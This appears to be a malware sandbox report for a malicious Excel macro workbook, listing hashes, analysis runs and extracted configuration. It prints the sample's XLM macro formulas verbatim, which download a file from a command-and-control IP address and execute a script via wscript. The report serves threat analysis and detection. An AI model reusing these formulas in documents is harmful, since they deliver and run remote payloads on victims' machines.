a0b88326639be542d958591f7e3d5446 | Triage

Submit
Reports

Overview

overview

Static

static

a0b8832663...6.xlsm

windows7-x64

a0b8832663...6.xlsm

windows10-2004-x64

Sharing

Copy URL Twitter E-mail

Static task

static1

Behavioral task

behavioral1

Sample

a0b88326639be542d958591f7e3d5446.xlsm

Resource

win7-20231215-en

windows7-x64

7 signatures

150 seconds

Behavioral task

behavioral2

Sample

a0b88326639be542d958591f7e3d5446.xlsm

Resource

win10v2004-20231215-en

windows10-2004-x64

7 signatures

150 seconds

General

Target

a0b88326639be542d958591f7e3d5446
Size

6KB
MD5

a0b88326639be542d958591f7e3d5446
SHA1

f729806c8f36cd09adc18f8f52501cf960a10bad
SHA256

745510490ac5748a141d84c0fbacc8710792cc9b60ccddbdc5a56348c35a1d76
SHA512

afb8881c733c97b677beb4762e460cfd41cff27777b0c5da439ddf602bc6047374eb51b683cd5ab9f90122787e2fc21cf15e1e474d0e5c02a996f88578a88de9
SSDEEP

192:NDSRuSWbrA2OmmfRZ8UhHFBFYuHb98yr8+U:NKurM2wf1FYib98yry

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes

formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

a0b88326639be542d958591f7e3d5446
.xlsm office2007

© 2018-2025

Terms | Privacy